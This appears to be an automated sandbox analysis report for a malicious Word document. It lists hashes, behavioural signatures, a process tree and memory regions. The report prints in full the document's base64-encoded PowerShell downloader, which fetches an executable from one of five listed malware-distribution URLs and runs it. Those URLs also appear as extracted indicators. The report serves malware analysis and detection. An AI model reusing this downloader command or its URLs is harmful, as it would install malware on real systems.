Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 13:02

General

  • Target

    6b05bea9195fa2aa09b6c86038221073_JaffaCakes118.doc

  • Size

    484KB

  • MD5

    6b05bea9195fa2aa09b6c86038221073

  • SHA1

    5b62fe9202aba72540d674741d3fd024641cac4f

  • SHA256

    ea31594f27362ee525951c5a3d47a94b66cdbb51a7227c4381d622df57c7c7bc

  • SHA512

    8bfb1d02d1eb64118db00ab619fbe4a3a830c06b7782b12d96f40e5c1b762c7a6f77748a39f549405664b31db477684f502c780561d0740b9b30c289a2506800

  • SSDEEP

    6144:zdlSApEXv/354poAMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwvVAJTVH:zDSApaX54poA8SVIf51E4K14o8IuD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.venturelendingllc.com/Wxw9QNt8I

exe.dropper

http://barabooseniorhigh.com/FWLR2ZT

exe.dropper

http://mimiabner.com/x7bQDOiSJe

exe.dropper

http://vesidailucachau.com/F1zcXKyj

exe.dropper

http://altuntuval.com/8cfiGmIXk

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6b05bea9195fa2aa09b6c86038221073_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2604
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwershell.exe
      POwershell -e JABqADQANwAxAF8AMAA9ACgAJwBBADgAXwA5ADIAJwArACcAOQAnACsAJwA1ACcAKQA7ACQAegA3ADcAMAA1ADYAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQASQA5ADMAMAA0ADUAOAA9ACgAJwBoAHQAJwArACcAdABwADoALwAvAHcAdwB3ACcAKwAnAC4AdgAnACsAJwBlACcAKwAnAG4AJwArACcAdAB1AHIAZQAnACsAJwBsAGUAJwArACcAbgBkAGkAJwArACcAbgBnAGwAbABjAC4AYwAnACsAJwBvAG0ALwAnACsAJwBXAHgAdwA5ACcAKwAnAFEATgAnACsAJwB0ADgASQBAAGgAJwArACcAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAYgAnACsAJwBhAHIAYQAnACsAJwBiAG8AbwAnACsAJwBzAGUAbgBpAG8AcgBoAGkAZwBoAC4AYwBvAG0ALwBGACcAKwAnAFcAJwArACcATABSACcAKwAnADIAWgAnACsAJwBUAEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8AJwArACcALwBtAGkAbQAnACsAJwBpACcAKwAnAGEAJwArACcAYgBuAGUAJwArACcAcgAuACcAKwAnAGMAJwArACcAbwBtAC8AeAA3AGIAUQBEAE8AaQBTAEoAZQBAAGgAdAB0AHAAJwArACcAOgAvAC8AdgBlAHMAJwArACcAaQBkAGEAaQAnACsAJwBsAHUAYwBhAGMAaABhAHUALgBjAG8AbQAnACsAJwAvAEYAMQAnACsAJwB6ACcAKwAnAGMAWABLACcAKwAnAHkAagBAACcAKwAnAGgAJwArACcAdAB0AHAAOgAnACsAJwAvAC8AYQBsACcAKwAnAHQAJwArACcAdQAnACsAJwBuAHQAJwArACcAdQAnACsAJwB2AGEAbAAnACsAJwAuAGMAbwBtAC8AOABjAGYAaQBHAG0ASQBYAGsAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAegA4AF8ANQBfADQAPQAoACcAUQAnACsAJwBfAF8AMgA4AF8AMgA4ACcAKQA7ACQATgAwAF8ANwA5ADgAMwAgAD0AIAAoACcAMgAxACcAKwAnADUAJwApADsAJABOADMANQA1ADAAXwA9ACgAJwBOAF8AMwAxACcAKwAnADAAXwAnACsAJwA3ADgAJwApADsAJABIAF8ANQA0ADQANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgAwAF8ANwA5ADgAMwArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGQAMwA1ADQANgA1AF8ANQAgAGkAbgAgACQASQA5ADMAMAA0ADUAOAApAHsAdAByAHkAewAkAHoANwA3ADAANQA2AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAMwA1ADQANgA1AF8ANQAsACAAJABIAF8ANQA0ADQANwApADsAJAByAF8AMQA3ADUANwA9ACgAJwBOACcAKwAnADcAXwBfADIAXwAnACsAJwA2ADQAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQASABfADUANAA0ADcAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABIAF8ANQA0ADQANwA7ACQAagAzADMANgA5ADUAPQAoACcASABfADIAMwAnACsAJwAyADUANgA3ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABFAF8AXwBfADkAMAA5AD0AKAAnAFkAXwA1ADAANwAnACsAJwA5ACcAKQA7AA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1820

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      9a58c507b1bd3a73786d5c93100b9a5e

      SHA1

      a1f67bc6486bc954c9bd902d6ba77b83b2e4774b

      SHA256

      c556f088366ecfd4d36e5c27cc8cda31a44e3e73077eca885194263345bf0b4f

      SHA512

      30663b138bf3f19ec6fc8e589b6851c3d5e42538c80ead0cf44cb5474f847d2e44674c9bead085c9e07a3599717e60623b7dda970fe0a51fc9199b7161371be2

    • memory/1820-132-0x00000000027E0000-0x00000000027E8000-memory.dmp

      Filesize

      32KB

    • memory/1820-131-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

      Filesize

      2.9MB

    • memory/2064-125-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-12-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-17-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-124-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-15-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-14-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-13-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-123-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-11-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-10-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-9-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-8-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-102-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-122-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-2-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/2064-0-0x000000002FA21000-0x000000002FA22000-memory.dmp

      Filesize

      4KB

    • memory/2064-16-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-18-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-21-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-90-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-70-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-60-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-50-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-40-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-35-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-29-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-28-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-27-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-139-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/2064-140-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB

    • memory/2064-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2064-162-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/2064-163-0x00000000004E0000-0x00000000005E0000-memory.dmp

      Filesize

      1024KB